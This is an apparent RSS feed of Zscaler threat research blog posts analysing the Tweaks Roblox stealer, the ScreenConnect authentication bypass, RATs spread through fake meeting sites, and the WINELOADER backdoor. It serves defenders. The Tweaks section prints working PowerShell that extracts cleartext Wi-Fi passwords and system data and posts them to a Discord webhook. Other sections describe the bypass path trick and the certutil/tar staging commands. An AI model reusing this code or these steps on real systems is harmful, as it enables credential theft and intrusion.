Security Research | Blog Category Feed
https://www.zscaler.com/
Zscaler Blog — News and views from the leading voice in cloud security.enTweaks Stealer Targets Roblox Users Through YouTube and Discord
https://www.zscaler.com/blogs/security-research/tweaks-stealer-targets-roblox-users-through-youtube-and-discord
IntroductionZscaler’s ThreatLabz recently discovered a new campaign distributing an infostealer called Tweaks (aka Tweaker) that targets Roblox users. Attackers are exploiting popular platforms, like YouTube and Discord, to distribute Tweaks to Roblox users, capitalizing on the ability of legitimate platforms to evade detection by web filter block lists that typically block known malicious servers. Attackers share malicious files disguised as Frames Per Second (FPS) optimization packages with users and, in turn, users infect their own systems with Tweaks malware.Given that 45% of Roblox users are under 13, it’s probable that the malware being circulated could extend to parents’ systems. Furthermore, with the proliferation of remote work, there’s a possibility of this malware infiltrating corporate devices (surreptitiously) used by children of employees. Not only does a successful infection leave Roblox account data vulnerable, but it may also compromise the data and device.In this blog, we analyze the Tweaks attack campaign and its technical characteristics.Key TakeawaysThe Tweaks or Tweaker stealer masquerades as a tool to enhance frames per second (FPS) for Roblox users that steals data in the background without the user’s knowledge.The attackers leverage YouTube by enticing users to watch videos on "How to increase FPS" that contain links to their Discord groups. Once users join these groups, the attackers provide them with links to malicious files disguised as game tweaks and modifications.The stealer is Powershell-based and exfiltrates sensitive data like user information, location, Wi-Fi profiles, and passwords, Roblox IDs, and in-game currency details.Once sensitive data is obtained, it is sent via a Discord webhook to the attacker-controlled server. ThreatLabz researchers discovered multiple attackers copying a “free” version of Tweaks and using it to sell “paid” versions. BackgroundWhy is FPS appealing to Roblox users?The Roblox game boasts a massive user base consisting of millions of players worldwide. Roblox offers a diverse range of games and experiences, allowing players to explore virtual worlds and engage in various activities. One feature that attracts Roblox players is the desire for an enhanced gaming experience, including improved FPS. Higher FPS can result in smoother gameplay, making it an appealing prospect for players seeking optimal performance. It’s not unusual for gamers to download optimization tools from popular platforms like YouTube and Discord to increase their hardware performance – making it more likely that a gamer might unintentionally download the Tweaks malware.Gaming sees more cyber attacksRoblox's significant user base of 71.5 million daily active users makes it an attractive target for cyber attackers. In addition, a 2024 report shows that the gaming industry is now worth around $455.27 billion. In light of these trends, it is not surprising that hackers looking to exploit and monetize sensitive data are targeting Roblox users, who, like many other gamers, store a wealth of data in their gaming accountsCampaign AnalysisDuring our investigation, we discovered several YouTube channels and videos offering tutorials on how to improve FPS in Roblox. In these videos, Roblox players were instructed to disable their antivirus software to ensure the smooth operation of a “PC optimizer” without encountering any issues. In reality, this tactic is used to make a user’s system easier to infect with malware.In the description boxes of these videos, links to the attacker’s corresponding Discord groups are provided. Figure 1 below shows a Tweaks YouTube channel, the Discord group links provided to the user, and the initial Tweaks interface that appears when users download the initial file.Figure 1: An example of a Tweaks YouTube channel, links to Discord groups, and the Tweaks interface.Once they enter the attacker-controlled Discord channels, users encounter both free and paid versions of FPS optimization files. Our initial analysis revealed that both versions were identical, utilizing the same BAT file. Consequently, the choice between the free and paid versions had no impact on the outcome. The only distinction was that users who opted for the paid version experienced a small financial loss and had their data stolen.Presently, attackers entice new users by offering a free version with limited optimization features, alongside a paid version that promises more advanced optimization capabilities.Once users download the files, they unknowingly install the Tweaks malware, which not only infects their system but also puts their data at risk of being stolen. From the user's perspective, everything seems normal as the Tweaks malware genuinely enhances FPS optimization. This deceptive behavior makes users less suspicious of the malware since it appears to be fulfilling its intended purpose. Figure 2 below shows both the paid and free version of Tweaks on the Discord channel.Figure 2: An example of the Discord group advertising FPS optimization files to distribute Tweaks malware.Case Study 1After joining the Discord group, Roblox gamers are directed to download a malicious BAT file from a Mediafire link, leading to a malware infection.Once the malware is executed, the BAT file presents users with the Tweaks menu interface, while simultaneously stealing their information in the background. The stolen data is then sent via Discord webhooks to an attacker-controlled server.The figure below illustrates the Tweaks attack chain.Figure 3: Illustrates the Tweaks attack chain involving a Discord group supplying a BAT file.Case Study 2Upon further investigation, we discovered that Tweaks was being sold on Discord. Two versions are available for purchase: the Beta Menu and the Paid Menu.The malware author converted the BAT file into an EXE file and then inserted the EXE file into a password-protected ZIP archive. This new iteration employs the same stealing capabilities as the BAT file discussed in Case Study 1. The figure below illustrates the Tweaks attack chain for Case Study 2. Figure 4: This diagram illustrates the Tweaks attack chain involving a Discord group supplying an EXE file inside of a ZIP archive.CapabilitiesThe Tweaks malware can steal the following data:User’s Wi-Fi profiles and passwordsUUID and usernamesUser locationIP address and timeSystem informationRoblox ID and in-game currency informationTechnical AnalysisThe following analysis covers the technical characteristics of Case Study 1 and Case Study 2 for Tweaks.Case Study 11. BAT files establish webhooks: To start, once the user downloads the BAT file and executes it, the malware establishes the necessary webhook URLs using the Powershell commands below:"$payload = [PSCustomObject]@{ embeds = @($embedObject) };" ^
"Invoke-RestMethod -Uri $webHookUrl -Body ($payload | ConvertTo-Json -Depth 4) -Method Post -ContentType 'application/json';"The file embeds the pilfered data within the webhooks, ensuring its transmission to the attackers.2. Wi-Fi profile and password theft: The malware steals Wi-Fi profiles and passwords with the Powershell command below:
“$wifiProfiles = (netsh wlan show profiles | Select-String 'All User Profile' | ForEach-Object { $_.ToString().Split(':')[1].Trim() } | ForEach-Object { $ssid = $_; $pwd = (netsh wlan show profile name=$ssid key=clear) | Select-String 'Key Content' | ForEach-Object { $_.ToString().Split(':')[1].Trim() }; if ($pwd) { Write-Output ('SSID: ' + $ssid + ', Password: ' + $pwd) } else { Write-Output 'SSID: ' + $ssid + ', Password: NO PASSWORDS FOUND' } });”The code sample above is also shown in Figure 5 below.Figure 5: Tweaks code showing the webhook setup and Wi-Fi profiles/password theft.3. Using WMI to harvest system information: The malware leverages Windows Management Instrumentation (WMI) to collect UUIDs and usernames along with the user's location including the following fields: country, region, city, and approximate location. The Powershell code looks like this:"$hwid = (Get-WmiObject win32_computersystemproduct | Select-Object -ExpandProperty UUID);" ^
"$pcUsername = $env:USERNAME;"
"$ipInfo = Invoke-RestMethod -Uri 'http://ipinfo.io/json';" ^
"$country = $ipInfo.country;" ^
"$region = $ipInfo.region;" ^
"$city = $ipInfo.city;" ^
"$location = $ipInfo.loc;"The code sample above, along with the user’s location and username, are shown in Figure 6 below.Figure 6: Tweaks code showing the theft of UUID, user name, and the user’s location.4. Additional data theft: In addition, the malware collects IP information like private and public IP addresses, the current time, system information, Roblox ID, and currency information.The former values are collected using the following Powershell code:"$publicIp = (Invoke-RestMethod -Uri 'https://api64.ipify.org?format=json').ip;" ^
"$privateIp = (Test-Connection -ComputerName $env:COMPUTERNAME -Count 1).IPV4Address.IPAddressToString;" ^
"$currentTime = Get-Date -Format 'yyyy-MM-dd HH:mm:ss';" ^
"$description = 'Public IP: ' + $publicIp + ' - Private IP: ' + $privateIp + ' - Current Time: ' + $currentTime;"The latter values are collected with the code shown in Figure 7 below.Figure 7: Tweaks code showing the collection of system information, Roblox ID, and in-game currency details.Case Study 2In Case Study 2, when the user follows the link mentioned in the Discord group, a ZIP archive is downloaded, which contains an EXE file. Once the user executes the EXE file, it displays the Tweaks menu interface similar to Case Study 1.The malware creates a folder in the Temp directory, C:\Users\<user_name>\AppData\Local\Temp\F9B9.tmp, with a random name and creates a BAT file in that directory as shown in the screenshot below.Figure 8: The process tree of the Tweaks EXE file.The source code of the dropped BAT file is similar to the BAT file used in Case Study 1 and its functionality is the same.ConclusionAttackers are leveraging popular community platforms, like YouTube and Discord, to distribute Tweaks malware and steal sensitive data. They capitalize on the legitimate reputation of YouTube and Discord communities to trick victims into inadvertently downloading (and in some cases paying) for their own malware infections. To mitigate these risks, Roblox users (and all gamers) should prioritize using legitimate apps from reputable and secure sources, thereby avoiding unknown or unverified application origins. By adhering to these precautions, gamers can enhance their cybersecurity defenses and protect themselves from potential malware threats.Zscaler Sandbox CoverageDuring our investigation of this campaign, the Zscaler Sandbox played a crucial role in analyzing the behavior of various files. Because of the sandbox analysis, threat scores and specific MITRE ATT&CK techniques triggered were identified. Figure 9: Sandbox reportWin32.PWS.TWEAKS BAT.PWS.TWEAKSMITRE ATT&CK TechniquesIDTechnique NameT1566PhishingT1082System Information DiscoveryT1064ScriptingT1010Application Windows DiscoveryT1047Windows Management InstrumentationT1016.002Wi-Fi DiscoveryT1016System Network Configuration DiscoveryT1059Command and Scripting InterpreterT1018Remote System DiscoveryT1562Disable or Modify ToolsIndicators Of Compromise (IOCs)MD5File Typee35864892846be3462139f9534d5ddb5EXE0e8d32259b06ab01cd04587b1ae5d0c1BAT Webhook URLhttps://discord[.]com/api/webhooks/1193562861071511683/Y3e960iiIYKeT-2hq8c0VDuprdKTD3u5F1f0AKfPQnQde8CoXnK2HzVoVGb6mBgXTsc6https://discordapp[.]com/api/webhooks/1197341553404956752/xoPYo_fCPQGLsUIBrreFz05R9JuX_K4L96ResReZ7oLtj1za6QSYlCuMnTB8raMpVqCw YouTube Channelshttps://www.youtube[.]com/@cartistweaks/videoshttps://www.youtube[.]com/@fraidtweaks Tue, 12 Mar 2024 14:52:56 -0700Preet Kamalhttps://www.zscaler.com/blogs/security-research/tweaks-stealer-targets-roblox-users-through-youtube-and-discordMultiple Vulnerabilities Found In ConnectWise ScreenConnect
https://www.zscaler.com/blogs/security-research/multiple-vulnerabilities-found-connectwise-screenconnect
IntroductionOn February 19, 2024, ConnectWise released an advisory disclosing critical vulnerabilities impacting ScreenConnect Remote Monitoring and Management (RMM) software. The first vulnerability, tracked as CVE-2024-1709, allows threat actors to bypass authentication and exploit a second vulnerability, CVE-2024-1708. The second vulnerability is a path traversal flaw that enables attackers to upload a malicious file, potentially leading to Remote Code Execution (RCE) on affected versions of ScreenConnect instances.
The technical details of this vulnerability underscore its easy exploitability, utilizing common tactics, techniques, and procedures (TTPs) that could lead to data exfiltration and lateral movement across compromised instances.
RecommendationsZscaler ThreatLabz strongly recommends on-premises users of ConnectWise ScreenConnect software to promptly upgrade to the latest version, which has crucial fixes to mitigate the vulnerabilities identified as CVE-2024-1709 and CVE-2024-1708.
Affected VersionsThe following versions of ConnectWise ScreenConnect are affected by the vulnerabilities disclosed and should be updated immediately:
ScreenConnect 23.9.7 and prior
BackgroundConnectWise ScreenConnect enables users to manage, connect, and access systems remotely. The remote access solution is available for on-prem and cloud architectures. ConnectWise’s advisory prompted the Cybersecurity & Infrastructure Security Agency (CISA) to add CVE-2024-1709 to their Known Exploited Vulnerabilities Catalog. CVE-2024-1709 earned a critical CVSS score of 10.0, while CVE-2024-1708 received a score of 8.4.
CVE-2024-1709 allows a remote attacker to gain access to systems with admin privileges. Once inside the compromised system, the attacker leverages CVE-2024-1708 to upload malicious files to the compromised system and potentially achieve RCE.
An attacker can exploit these vulnerabilities to:
Access, upload, or modify important files
Steal sensitive information and disrupt critical services
Move laterally on the breached network
How It WorksThe attack sequence begins by sending a malformed HTTP request to the vulnerable ScreenConnect instance. Specifically, this means appending any character to the /SetupWizard.aspx URL (i.e., /SetupWizard.aspx<something>) to gain unauthenticated access to the /SetupWizard.aspx page.
The /SetupWizard.aspx page allows the attacker to create a new user account with administrator privileges, even on a pre-configured instance, without requiring any authentication. This exploit is possible due to a flaw in the SetupWizard.aspx file, responsible for the initial administrator setup and license validation on the instance.
Once inside the system, the attacker uploads a malicious ASHX ScreenConnect extension, packaged in a ZIP archive, to achieve RCE and later obtain a remote web shell. The attack sequence is shown in Figure 1.
Figure 1: A diagram illustrating how an attacker targets a vulnerable ScreenConnect instance.
Exploitation Steps1. Malformed HTTP Request: The attacker launches the attack by sending a malformed HTTP request to the vulnerable ScreenConnect instance as shown below.
Figure 2: An example of a malformed HTTP request targeting CVE-2024-1709.
The figure below shows CVE-2024-1709 exploitation via a 302 redirect to the /SetupWizard.aspx page.
Figure 3: Exploitation of CVE-2024-1709.
2. Arbitrary Admin Account Creation: Upon receiving the malicious request, the ScreenConnect instance processes the request and redirects to the /SetupWizard.aspx page, where the attacker can create an administrator account as shown in Figure 4.
Figure 4: The ScreenConnect page where the attacker can fraudulently create an administrator user account.
The figure below includes XML showing that the attacker was able to successfully create an administrator user account.
Figure 5: ScreenConnect\App_Data\User.xml shows evidence of the attacker-created administrator user account.
3. Malicious Payload Delivery: The attacker uploads a malicious ScreenConnect extension (shown in Figure 6) wrapped in a ZIP archive to the vulnerable instance. This ZIP archive contains an ASHX file designed to exploit CVE-2024-1708 and facilitate RCE on the vulnerable system.
Figure 6: A POST transaction depicting the installation of a malicious extension on a ScreenConnect Instance.
4. Malicious Code Execution: Following the successful upload of the malicious ScreenConnect extension (.ashx file), the vulnerable system executes the code contained within the payload as shown in Figure 7. This execution grants the attacker unauthorized access and control over the compromised system, enabling further exploitation and privilege escalation.
Figure 7: The malicious ZIP archive uploaded by the attacker containing a Base64-encoded command invoking cmd.exe for remote code execution.
According to reports, the post-exploitation phase included the deployment of ToddlerShark malware, leveraging the second vulnerability. ToddlerShark malware demonstrates polymorphic behavior and utilizes legitimate Microsoft binaries and alternate data streams. It bears a striking resemblance to BabyShark malware, which has been associated with the North Korean APT group known as Kimsuky.
Zscaler Best PracticesSafeguard crown jewel applications by limiting lateral movement using Zscaler Private Access™ with advanced Deception turned on.
Route all server traffic through Zscaler Private Access™ with the application security module enabled and Zscaler Internet Access™, which provides visibility to identify and stop malicious activity from compromised systems/servers.
Turn on Zscaler Advanced Threat Protection™ to block all known command-and-control (C2) domains — thereby adding another layer of protection if an attacker exploits this vulnerability to implant malware.
Extend command-and-control (C2) protection to all ports and protocols with Zscaler Cloud Firewall™ (Cloud IPS module), including emerging C2 destinations. Doing so provides additional protection if the attacker exploits this vulnerability to implant malware.
Use Zscaler Cloud Sandbox™ to prevent unknown malware delivered as art of a second-stage payload.
Inspect all TLS/SSL traffic and restrict traffic to critical infrastructure from an allowed list of known-good destinations.
ConclusionTo ensure security, ConnectWise ScreenConnect users should update their on-prem deployments to version 23.9.8 or above promptly. Cloud-based deployments, on the other hand, do not require any action as ConnectWise has already applied the necessary patches. Failing to update exposes systems to vulnerabilities such as CVE-2024-1709 and CVE-2024-1708. These vulnerabilities enable threat actors to manipulate server configurations, gain administrator-level privileges, and execute remote code.
Indicators of CompromiseConnectWise reported active exploitation of CVE-2024-1709 and released the following Indicators of Compromise (IOCs):
155[.]133[.]5[.]15
155[.]133[.]5[.]14
118[.]69[.]65[.]60
Zscaler CoverageThe Zscaler ThreatLabz team has deployed the following:
Zscaler Advanced Threat Protection
APP.EXPLOIT.CVE-2024-1708_CVE-2024-1709
Zscaler Private Access AppProtection
6000760 - ConnectWise ScreenConnect SetupModule Authentication Bypass (CVE-2024-1709)
For more details, visit the Zscaler Threat Library.
Referencesconnectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8
Understanding the ConnectWise ScreenConnect CVE-2024-1709 & CVE-2024-1708 | Huntress Blog
https://www.bleepingcomputer.com/news/security/connectwise-urges-screenconnect-admins-to-patch-critical-rce-flaw/
Detection Guidance for ConnectWise CWE-288 (huntress.com)
https://github.com/W01fh4cker/ScreenConnect-AuthBypass-RCE
Mon, 11 Mar 2024 14:30:19 -0700Arkaprava Tripathihttps://www.zscaler.com/blogs/security-research/multiple-vulnerabilities-found-connectwise-screenconnectAndroid and Windows RATs Distributed Via Online Meeting Lures
https://www.zscaler.com/blogs/security-research/android-and-windows-rats-distributed-online-meeting-lures
IntroductionBeginning in December 2023, Zscaler’s ThreatLabz discovered a threat actor creating fraudulent Skype, Google Meet, and Zoom websites to spread malware. The threat actor spreads SpyNote RAT to Android users and NjRAT and DCRat to Windows users. This article describes and shows how the threat actor’s malicious URLs and files can be identified on these fraudulent online meeting websites.
Key Takeaways
A threat actor is distributing multiple malware families using fake Skype, Zoom, and Google Meet websites.
The threat actor is distributing Remote Access Trojans (RATs) including SpyNote RAT for Android platforms, and NjRAT and DCRat for Windows systems.
Campaign OverviewThe attacker utilized shared web hosting, hosting all these fake online meeting sites on a single IP address. All of the fake sites were in Russian as shown in all the figures below. In addition, the attackers hosted these fake sites using URLs that closely resembled the actual websites.
Attack SequenceThe diagram below illustrates how the malware was distributed and executed on the victim's machine during the campaign:
Figure 1: Attack chain and execution flow for Android and Windows campaigns.
When a user visits one of the fake sites, clicking on the Android button initiates the download of a malicious APK file, while clicking on the Windows button triggers the download of a BAT file. The BAT file when executed performs additional actions, ultimately leading to the download of a RAT payload.
SkypeDuring our investigation, we discovered that the first fake site, join-skype[.]info, was created in early December to deceive users into downloading a fake Skype application as shown in Figure 2.
Figure 2: The fraudulent Skype website, with a fake domain meant to resemble the legitimate Skype domain. (Image courtesy of urlscan.io.)
The Windows button pointed to a file named Skype8.exe and the Google Play button pointed at Skype.apk (neither of these files was available at the time of analysis). The Apple App Store button redirected to https://go.skype.com/skype.download.for.phone.iphone, indicating that the threat actor was not targeting iOS users with malware.
Google MeetIn late December, the attacker created another fake site, online-cloudmeeting[.]pro, mimicking Google Meet as shown in Figure 3. The fake Google Meet site was hosted on online-cloudmeeting[.]pro/gry-ucdu-fhc/ where the subpath gry-ucdu-fhc was deliberately created to resemble a Google Meet joining link. Genuine Google Meet invite codes typically follow the structure [a-z]{3}-[a-z]{4}-[a-z]{3}.
The fake site provides links to download a fake Skype application for Android and/or Windows. The Windows link leads to a BAT file named updateZoom20243001bit.bat, which in turn downloads the final payload named ZoomDirectUpdate.exe. This final payload is a WinRAR archive file that contains DCRat, packed with Eziriz .NET Reactor.
Figure 3: The fake Google Meet page, showing the fraudulent domain in the address bar for a fake Google Meet Windows application link to a malicious BAT file that downloads and executes malware.
The Android link in this figure led to a SpyNote RAT APK file named meet.apk.
ZoomIn late January, we observed the emergence of a fake Zoom site (shown in Figure 4), us06webzoomus[.]pro. The fake Zoom site, hosted at the URL us06webzoomus[.]pro/l/62202342233720Yzhkb3dHQXczZG1XS1Z3Sk9kenpkZz09/, features a subpath that closely resembles a meeting ID generated by the Zoom client. If a user clicks the Google Play link, a file named Zoom02.apk will be downloaded containing the SpyNote RAT. Similar to the fake Google Meet site, when a user clicks the Windows button it downloads a BAT file, which in turn downloads a DCRat payload.
Figure 4: The fake Zoom page, showing a domain similar to the real Zoom domain in the address bar and a link to the malicious APK file that contains SpyNote RAT when the Google Play button is clicked.
Open DirectoriesIn addition to hosting DCRat, the fake Google Meet and Zoom websites also contain an open directory (shown in Figure 5) with two additional Windows executable files named driver.exe and meet.exe (inside the archive gry-ucdu-fhc.zip), which are NjRAT. The presence of these files suggests that the attacker may utilize them in other campaigns, given their distinct names.
Figure 5: Example of additional malicious files hosted on the websites hosting fake online meeting applications.
ConclusionOur research demonstrates that businesses may be subject to threats that impersonate online meeting applications. In this example, a threat actor is using these lures to distribute RATs for Android and Windows, which can steal confidential information, log keystrokes, and steal files. Our findings highlight the need for robust security measures to protect against advanced and evolving malware threats and the importance of regular updates and security patches.
As cyber threats continue to evolve and become increasingly complex, it is critical to remain alert and take proactive measures to protect against them. Zscaler's ThreatLabz team is dedicated to staying on top of these threats and sharing our findings with the wider community.
Zscaler Sandbox CoverageDuring our investigation of this campaign, the Zscaler sandbox played a vital role in analyzing the behavior of different files. The sandbox analysis allowed us to identify threat scores and pinpoint specific MITRE ATT&CK techniques that were triggered during the analysis process.
Figure 6: DCRat Zscaler sandbox report
Figure 7: NjRAT Zscaler sandbox report
Zscaler’s multilayered cloud security platform detected payloads with the following threat names:
Win32.Backdoor.DCRat
Win32.Backdoor.NjRat
MITRE ATT&CK TechniquesEnterprise MatrixTACTIC
TECHNIQUE ID
TECHNIQUE NAME
Execution
T1064
T1059.001
Scripting
PowerShell
Persistence
T1547.001
Registry Run Keys / Startup Folder
Privilege Escalation
T1547
Boot or Logon Autostart Execution
Defense Evasion
T1140
T1064
T1027
T1027.002
T1070.004
T1036
Deobfuscate/Decode Files or Information
Scripting
Obfuscated Files or Information
Software Packing
File Deletion
Masquerading
Credential Access
T1056
T1555
Input Capture
Credentials from Password Stores
Discovery
T1124
T1083
T1082
T1518.001
T1057
T1010
T1018
T1016
T1120
System Time Discovery
File and Directory Discovery
System Information Discovery
Security Software Discovery
Process Discovery
Application Window Discovery
Remote System Discovery
System Network Configuration Discovery
Peripheral Device Discovery
Collection
T1123
T1115
T1056
T1113
T1125
Audio Capture
Clipboard Data
Input Capture
Screen Capture
Video Capture
Command and Control
T1219
T1573
T1571
T1095
T1071
Remote Access Software
Encrypted Channel
Non-Standard Port
Non-Application Layer Protocol
Application Layer Protocol
Impact
T1498
T1529
Network Denial of Service
System Shutdown/Reboot
Mobile MatrixTACTIC
TECHNIQUE ID
TECHNIQUE NAME
Persistence
T1624
T1444
Event Triggered Execution: Broadcast Receivers
Masquerade as Legitimate Application
Privilege Escalation, Persistence
T1626
T1546
Abuse Elevation Control Mechanism Event Triggered Execution
Collection
T1533 T1429 T1430 T1636
Data from Local System
Audio Capture
Location Tracking
Contact and SMS data
Tue, 05 Mar 2024 08:30:01 -0800Himanshu Sharmahttps://www.zscaler.com/blogs/security-research/android-and-windows-rats-distributed-online-meeting-luresEuropean diplomats targeted by SPIKEDWINE with WINELOADER
https://www.zscaler.com/blogs/security-research/european-diplomats-targeted-spikedwine-wineloader
IntroductionZscaler's ThreatLabz discovered a suspicious PDF file uploaded to VirusTotal from Latvia on January 30th, 2024. This PDF file is masqueraded as an invitation letter from the Ambassador of India, inviting diplomats to a wine-tasting event in February 2024. The PDF also included a link to a fake questionnaire that redirects users to a malicious ZIP archive hosted on a compromised site, initiating the infection chain. Further threat hunting led us to the discovery of another similar PDF file uploaded to VirusTotal from Latvia in July 2023.This blog provides detailed information about a previously undocumented backdoor we named ‘WINELOADER'. We believe that a nation-state threat actor, interested in exploiting the geopolitical relations between India and diplomats in European nations, carried out this attack. The attack is characterized by its very low volume and the advanced tactics, techniques, and procedures (TTPs) employed in the malware and command and control (C2) infrastructure. While we have not yet attributed this attack to any known APT group, we have named this threat actor SPIKEDWINE based on the wine-related theme and filenames used in different stages of the attack chain, and our investigation into the case is ongoing.Key Takeaways
Low-volume targeted attack: The samples intentionally targeted officials from countries with Indian diplomatic missions, although VirusTotal submissions indicate a specific focus on European diplomats.
New modular backdoor: WINELOADER has a modular design, with encrypted modules downloaded from the command and control (C2) server.
Evasive tactics: The backdoor employs techniques, including re-encryption and zeroing out memory buffers, to guard sensitive data in memory and evade memory forensics solutions.
Compromised infrastructure: The threat actor utilized compromised websites at multiple stages of the attack chain.
Attack Chain
Figure 1 below illustrates the multi-stage attack chain at a high level.
Figure 1: Multi-stage attack chain of WINELOADER.
Technical Analysis
In this section, we provide a detailed analysis of each component of the attack chain initiated when a victim receives and clicks on the link within the PDF.
PDF analysis
The PDF file is a fake invitation to a wine-tasting event purported to take place at the Indian ambassador’s residence on February 2nd, 2024. The contents are well-crafted to impersonate the Ambassador of India. The invitation contains a link to a fake questionnaire, which kickstarts the infection chain.
The malicious link in the PDF invitation redirects users to a compromised site, hxxps://seeceafcleaners[.]co[.]uk/wine.php, that proceeds to download a ZIP archive containing an HTA file - wine.hta.
Figure 2 below shows the contents of the PDF file.
Figure 2: The PDF invitation showcasing the malicious link.
A quick analysis of the PDF file's metadata reveals that it was generated using LibreOffice version 6.4, and the time of creation was January 29th, 2024, at 10:38 AM UTC.
HTA file analysis
The HTA file downloaded in the previous section contains obfuscated JavaScript code, which executes the next stage of malicious activities. The obfuscation technique used in the code exhibits patterns that match those of the publicly available obfuscator obfuscator.io.
Figure 3 below shows a preview of the code inside the HTA file. Decoy content is displayed to the victim to disguise malicious activity. This content is similar to what was displayed in the original PDF (Figure 2 above) and includes information about the wine-tasting event in February 2024.
Figure 3: Obfuscated JavaScript code inside the HTA file.
The HTA file performs the following key functions:
Downloads a Base64 encoded text file from the URL: seeceafcleaners[.]co[.]uk/cert.php
Saves the text file to the path: C:\Windows\Tasks\text.txt
Uses certutil.exe to Base64 decode the text file and write the result to a ZIP archive with the path: C:\Windows\Tasks\text.zip. The command used is: certutil -decode C:\Windows\Tasks\text.txt C:\Windows\\Tasks\text.zip
Extracts the contents of the ZIP archive to the path: C:\Windows\Tasks\. The command used is: tar -xf C:\Windows\Tasks\text.zip -C C:\Windows\Tasks\. The ZIP archive contains two files named sqlwriter.exe and vcruntime140.dll. Here, sqlwriter.exe is the legitimate binary signed by Microsoft and vcruntime140.dll is the malicious DLL crafted by the attacker which will be side-loaded automatically when sqlwriter.exe is executed. Per our research, sqlwriter.exe has never been abused in-the-wild by any threat actor for DLL side-loading (at least to the best of our knowledge). This implies that the threat actor in this case put in extra effort to identify a signed Microsoft executable vulnerable to DLL side-loading.
Executes sqlwriter.exe from the path: C:\Windows\Tasks\ which will kick start the infection chain.
WINELOADER binary analysis
When executing sqlwriter.exe, it loads a malicious DLL named vcruntime140.dll from the same directory using DLL side-loading. The exported function set_se_translator is then executed. This function decrypts the embedded WINELOADER core module within the DLL using a hardcoded 256-byte RC4 key before executing it. This is shown in the screenshot below.
Figure 4: Code section that decrypts and executes the WINELOADER core module.
Each module consists of configuration data (e.g., C2 polling interval), an RC4 key, and encrypted strings, followed by the module code. Part of the decrypted WINELOADER core module is shown in Figure 5 below.
Figure 5: Data structure containing relevant configuration, RC4 key, encrypted strings, and the module.
WINELOADER employs the following techniques to evade detection:
Sensitive data is encrypted with a hardcoded 256-byte RC4 key. The sensitive data includes:
The core module and subsequent modules downloaded from the C2 server
Strings (e.g. DLL filenames and API import function names)
Data sent and received from the C2 server
Some strings are decrypted on use and re-encrypted shortly after.
Memory buffers for storing results from API calls or decrypted strings are zeroed after use.
DLL hollowing is then used to inject WINELOADER into a randomly selected DLL from the Windows system directory. The implementation is similar to the one presented by SECFORCE in their blog. WINELOADER includes additional randomization code to ensure that different DLLs are chosen for each instance of DLL hollowing (see Figure 6).
Figure 6: The randomization code used when selecting a Windows system DLL for DLL hollowing.
WINELOADER is not injected into the following DLLs as they contain exported functions used by the malware:
advapi32.dll
api-ms-win-crt-math-l1-1-0.dll
api-ms-win-crt-stdio-l1-1-0.dll
bcryptprimitives.dll
iphlpapi.dll
kernel32.dll
kernelbase.dll
mscoree.dll
ntdll.dll
ole32.dll
rpcrt4.dll
shlwapi.dll
user32.dll
wininet.dll
WINELOADER will inject itself into another randomly selected DLL again via DLL hollowing before it sends the first beacon request to the C2 server.
The beacon request is an HTTP GET request containing a request body, which is unusual for GET requests. All requests to the C2 server use the same User-Agent, Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.1) Gecko/20100101 Firefox/86.1, hardcoded into the sample itself.
The body of the HTTP GET request is encrypted with the same 256-byte RC4 key and the fields are as follows. We have appended a question mark to fields that we are unable to conclusively verify due to the limited data collected. This information in available in the table below.
Offset
Length
Name
Description
0x0
2
Length of padding bytes (n)
This value is randomized (min: 255, max: 65535), stored in little-endian (LE).
0x2
n
Padding bytes
Padding bytes are randomly generated with the ProcessPrng API.
0x2 + n
8
Campaign ID?
5F D5 97 93 ED 26 CB 5A in the analyzed sample.
0xa + n
8
Session ID?
Randomly generated on execution.
0x12 + n
8
Local IP address
The local IP address of the infected machine.
0x20 + n
512
Parent process name
In Unicode
0x220 + n
512
User name
In Unicode
0x420 + n
30
Machine name
In Unicode
0x43e + n
4
Parent process ID
In little-endian
0x442 + n
1
Parent process token elevation type
Information about the privileges of the token linked to the parent process.
0x443 + n
8
Polling interval for C2 requests
C0 d4 01 00 00 00 00 00 in the analyzed sample, translates to 120,000 ms or 2 mins between requests.
0x44b + n
1
Request type?
1 for beacon, 2 for status update
0x44c + n
8
Length of message
In little-endian. 0 for beacon requests
0x454 + n
8
Unknown?
Observed to match the value of the request type field.
0x45c + n
8
Module ID?
00 00 00 00 00 00 00 for the core module and 6B 19 A8 D2 69 2E 85 64 for the persistence module.
0x464 + n
Varies
Message
Only observed for type 2 requests.
Table 1: WINELOADER C2 beacon request fields
An example beacon request is shown below. The value of the Content-Length header varies across requests, as the padding length is randomized with a minimum of 1,381 bytes.
The same RC4 key is then used to decrypt the response from the C2 server. The fields for the decrypted response are shown in the table below.
Offset
Length
Name
Description
0x0
2
Length of padding bytes (n)
This value is stored in little-endian (LE).
0x2
n
Padding bytes
Unused bytes
0x2 + n
8
Campaign ID?
5F D5 97 93 ED 26 CB 5A in the analyzed sample
0xa + n
1
Command
Command from C2
0xb + n
Varies
Command data
Binary data for command
Table 2: WINELOADER C2 response fields
The core module supports three commands:
Execute modules from the C2 either synchronously or asynchronously (via CreateThread)
Inject itself into another DLL
Update the sleep interval between beacon requests
During our research, we obtained a persistence module from the C2 server. This module copies sqlwriter.exe and vcruntime.dll into the C:\Windows\Tasks directory and creates a scheduled task named MS SQL Writer with the description SQL Server VSS Writer 64-bit to execute C:\Windows\Tasks\sqlwriter.exe daily.
The persistence module offers an alternative configuration to establish registry persistence at HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MS SQL Writer.
After establishing persistence for WINELOADER, the module sends an HTTP POST request to notify the C2 server about the completed task. The request body mirrors the structure of the beacon request.
Command And Control Infrastructure
The threat actor leveraged compromised network infrastructure at all stages of the attack chain. We identified three compromised websites used for hosting intermediate payloads or as C2 servers.
Based on our in-depth analysis of the C2 communication, we believe the C2 server only responds to specific types of requests at certain times. This measure prevents automated analysis solutions from retrieving C2 responses and modular payloads.
Conclusion
The threat discussed in this blog demonstrated advanced tactics, techniques, and procedures (TTPs), displaying a keen interest in exploiting the diplomatic relations between India and Europe. The threat actor put additional effort into remaining undetected by evading memory forensics and automated URL scanning solutions.
While we cannot currently attribute this activity to any known nation-state threat actor, we continue to monitor any new developments associated with this threat actor and ensure the necessary protections for our customers against these threats.
Zscaler Coverage
Figure 7: Zscaler sandbox detection report
In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to WINELOADER at various levels with the following threat names:
Win64.Downloader.WineLoader
Indicators Of Compromise (IOCs)
SHA256
Description
72b92683052e0c813890caf7b4f8bfd331a8b2afc324dd545d46138f677178c4
vcruntime140.dll (WINELOADER core module loader)
